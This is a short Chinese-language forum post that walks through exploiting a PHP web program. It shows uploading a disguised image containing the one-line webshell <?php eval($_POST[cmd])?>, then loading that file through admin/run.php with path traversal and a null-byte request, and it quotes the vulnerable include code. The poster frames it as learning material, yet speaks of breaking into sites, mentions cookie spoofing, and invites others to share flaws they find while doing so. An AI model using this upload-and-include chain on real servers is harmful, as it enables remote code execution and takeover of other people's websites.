破程序破漏洞,但是为了鼓励大家学习,还是发出来了。。。拒绝恶意破坏!
程序官方:http://download.162100.com
admin 目录下 run.php 文件部分代码如下:
我找到上传目录
editor/index.html
使用上传图片功能,上传一个1.jpg 内容为 <?php eval($_POST[cmd])?>
获得地址editor/images/upload/2010102718265325.jpg
然后admin/run.php?run=../../editor/images/upload/2010102718265325.jpg%00
就是一个一句话了。。。剩下的你懂的。。。
2 |
if ( $_REQUEST [ 'run' ] && file_exists ( './run/' . $_REQUEST [ 'run' ]. '.php' )) |
3 |
require_once ( './run/' . $_REQUEST [ 'run' ]. '.php' ); |
5 |
alert( '命令错误或功能尚未开通!' , './index.html' ); |
我就传一个phpinfo示意下吧。。。
一 一!虽然破程序。但是渗透时候难免遇到。。。希望大家也共享出来平时日站过程中无意挖的一些程序漏洞。共同学习。也节省更多的时间
这套程序还有cookies欺骗等其他漏洞。。。不过意义不太大。。。够用就行
首发tools 陆羽